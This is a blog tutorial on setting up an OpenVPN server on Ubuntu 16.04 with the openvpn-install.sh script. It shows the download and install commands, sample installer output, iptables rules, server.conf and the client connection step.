Blog and Tips for automation system development : FICUSONLINE F9E

2018-07-15 08:00 AM

Install the OpenVPN server to access the PC not asigned the global IP address from the external PC. OpenVPN is a full-featured SSL VPN (virtual private network). It is a little bit difficult to set up or make the configuration files fo SSL. But the shell script is distributed for implementing all of these tasks for SSL on Ubuntu16.04.

<Reference site>

https://www.cyberciti.biz/faq/howto-setup-openvpn-server-on-ubuntu-linux-14-04-or-16-04-lts/

The install process is like the followings;

Find and note down your public IP address
Download openvpn-install.sh script
Run openvpn-install.sh to install OpenVPN server
Connect an OpenVPN server using IOS/Android/Linux/Windows client
Verify your connectivity

1.Confirming the global IP Address

$ lshw

This command hecks the Logical name of the network item. In case of output shows "eth0";

$ ip addr show eth0

Would be confirmed the Global IP address.

But you would check the following site if the above output showed the local IP: Tsukuba University VPN Site.

2.Download the shell script: openvpn-install.sh

$ wget https://git.io/vpn -O openvpn-install.sh

The output would be the followings;

--2016-06-27 07:30:25--  https://git.io/vpn
Resolving git.io (git.io)... 23.23.173.104, 54.243.161.116, 23.23.111.66
Connecting to git.io (git.io)|23.23.173.104|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.github.com/Nyr/openvpn-install/master/openvpn-install.sh [following]
--2016-06-27 07:30:26--  https://raw.github.com/Nyr/openvpn-install/master/openvpn-install.sh
Resolving raw.github.com (raw.github.com)... 151.101.100.133
Connecting to raw.github.com (raw.github.com)|151.101.100.133|:443... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://raw.githubusercontent.com/Nyr/openvpn-install/master/openvpn-install.sh [following]
--2016-06-27 07:30:27--  https://raw.githubusercontent.com/Nyr/openvpn-install/master/openvpn-install.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.100.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.100.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13340 (13K) [text/plain]
Saving to: â€˜openvpn-install.shâ€™
 
openvpn-install.sh            100%[==============================================>]  13.03K  80.9KB/s    in 0.2s    
 
2016-06-27 07:30:28 (80.9 KB/s) - â€˜openvpn-install.shâ€™ saved [13340/13340]

3.Install OpenVPN Server

Implement the shell script.

$ sudo bash openvpn-install.sh

Input the following items: Global IP Address xx.xx.xx.xx、TCP or UDP（recommended）、Port No.、DNS（Google:8.8.8.8,8.8.4.4, APNIC and Cloudflare: 1.1.1.1, 1.0.0.1）、

Client Name：client（arbitrary). After that, proceed the next step of the SSL certification.

Okay, that was all I needed. We are ready to setup your OpenVPN server now
Press any key to continue...
Get:1 http://security.ubuntu.com 
......
...
..
--2016-06-27 17:10:38--  https://github.com/OpenVPN/easy-rsa/releases/download/3.0.1/EasyRSA-3.0.1.tgz
Resolving github.com (github.com)... 192.30.252.120
Connecting to github.com (github.com)|192.30.252.120|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://github-cloud.s3.amazonaws.com/releases/4519663/9dab10e8-7b6a-11e5-91af-0660987e9192.tgz?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAISTNZFOVBIJMK3TQ%2F20160627%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20160627T114040Z&X-Amz-Expires=300&X-Amz-Signature=717ae4f606d1999b4c7c164ae06d163c494197f04aafffa9f760a8e0bf136136&X-Amz-SignedHeaders=host&actor_id=0&response-content-disposition=attachment%3B%20filename%3DEasyRSA-3.0.1.tgz&response-content-type=application%2Foctet-stream [following]
--2016-06-27 17:10:40--  https://github-cloud.s3.amazonaws.com/releases/4519663/9dab10e8-7b6a-11e5-91af-0660987e9192.tgz?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAISTNZFOVBIJMK3TQ%2F20160627%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20160627T114040Z&X-Amz-Expires=300&X-Amz-Signature=717ae4f606d1999b4c7c164ae06d163c494197f04aafffa9f760a8e0bf136136&X-Amz-SignedHeaders=host&actor_id=0&response-content-disposition=attachment%3B%20filename%3DEasyRSA-3.0.1.tgz&response-content-type=application%2Foctet-stream
Resolving github-cloud.s3.amazonaws.com (github-cloud.s3.amazonaws.com)... 54.231.72.3
Connecting to github-cloud.s3.amazonaws.com (github-cloud.s3.amazonaws.com)|54.231.72.3|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 40960 (40K) [application/octet-stream]
Saving to: â€˜/root/EasyRSA-3.0.1.tgzâ€™
 
/root/EasyRSA-3.0.1.tgz       100%[================================================>]  40.00K  38.8KB/s   in 1.0s   
 
2016-06-27 17:10:43 (38.8 KB/s) - â€˜/root/EasyRSA-3.0.1.tgzâ€™ saved [40960/40960]
 
 
init-pki complete; you may now create a CA or requests.
Your newly created PKI dir is: /etc/openvpn/easy-rsa/pki
Generating a 2048 bit RSA private key
........+++
...............................................................................................+++
writing new private key to '/etc/openvpn/easy-rsa/pki/private/ca.key.BjRh5frdDd'
-----
Generating DH parameters, 2048 bit long safe prime, generator 2
This is going to take a long time
....+.....+................................................................................+..................................................................................................................................................................+......................................
...
..
.................................................................................................................+........................................................................................................................................+.................................+......................................................+...++*++*
 
DH parameters of size 2048 created at /etc/openvpn/easy-rsa/pki/dh.pem
 
Generating a 2048 bit RSA private key
.......................................................................+++
..................................................+++
writing new private key to '/etc/openvpn/easy-rsa/pki/private/server.key.9ieuluTC2R'
-----
Using configuration from /etc/openvpn/easy-rsa/openssl-1.0.cnf
Check that the request matches the signature
Signature ok
The Subject's Distinguished Name is as follows
commonName            :ASN.1 12:'server'
Certificate is to be certified until Jun 25 11:55:48 2026 GMT (3650 days)
 
Write out database with 1 new entries
Data Base Updated
Generating a 2048 bit RSA private key
.........+++
.........+++
writing new private key to '/etc/openvpn/easy-rsa/pki/private/iphone.key.lokNfOiobc'
-----
Using configuration from /etc/openvpn/easy-rsa/openssl-1.0.cnf
Check that the request matches the signature
Signature ok
The Subject's Distinguished Name is as follows
commonName            :ASN.1 12:'iphone'
Certificate is to be certified until Jun 25 11:55:48 2026 GMT (3650 days)
 
Write out database with 1 new entries
Data Base Updated
Using configuration from /etc/openvpn/easy-rsa/openssl-1.0.cnf
 
An updated CRL has been created.
CRL file: /etc/openvpn/easy-rsa/pki/crl.pem
 
244
 
Looks like your server is behind a NAT!
 
If your server is NATed (e.g. LowEndSpirit), I need to know the external IP
If that's not the case, just ignore this and leave the next field blank
External IP:

Adopted the firewall excluded rule for port 1194. For cheking it, implement the following command.

$ cat /etc/rc.local

Output would be;

iptables -I FORWARD -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -I FORWARD -s 10.8.0.0/24 -j ACCEPT
iptables -I INPUT -p udp --dport 1194 -j ACCEPT
iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -j SNAT --to 139.59.1.155

The following command to confirm the OpenVPN server configurations.

$ sudo vi /etc/openvpn/server.conf

The contents would be;

port 1194
proto udp
dev tun
sndbuf 0
rcvbuf 0
ca ca.crt
cert server.crt
key server.key
dh dh.pem
tls-auth ta.key 0
topology subnet
server 10.8.0.0 255.255.255.0
ifconfig-pool-persist ipp.txt
push "redirect-gateway def1 bypass-dhcp"
push "dhcp-option DNS 8.8.8.8"
push "dhcp-option DNS 8.8.4.4"
keepalive 10 120
cipher AES-128-CBC
comp-lzo
user nobody
group nogroup
persist-key
persist-tun
status openvpn-status.log
verb 3
crl-verify crl.pem

4.Copy the configuration file created by the shell script

Copy "client.opvn" to the client directory(whichever directory you like).

5.Access from the Client

Start OpenVPN Client with client.ovpn file (also install OpenVPN into the client PC).

$ sudo openvpn --client --config client.ovpn

The Shell script includes the following functions.

Looks like OpenVPN is already installed

What do you want to do?
   1) Add a cert for a new user　クライアントの追加認証
   2) Revoke existing user cert　認証取り消し
   3) Remove OpenVPN　OpenVPNのアンインストール
   4) Exit　終了
Select an option [1-4]:

Please also check the same topic in the forum.

Install OpenVPN Server

1.Confirming the global IP Address

2.Download the shell script: openvpn-install.sh

3.Install OpenVPN Server

4.Copy the configuration file created by the shell script

5.Access from the Client

FORUM UPDATE

BLOG&NEWS

Nginx Proxy on Azure Windows Server

Online Learning System BigBlueButton v2.4 on Docker

VPN Connection by WireGuard(AWS: EC2 or Lightsail)

Flexisip Account Manager, Provisioning

Flexisip SIP Server on Ubuntu 20.04 (Docker-Compose)

Online Store Update

Added the example of using WireGuard

Site Renewal

Design&Make : Pulse Oxymeter

Flexisip Password Encryption and TLS Certificate

TECHNOLOGY

SNS

CONTACT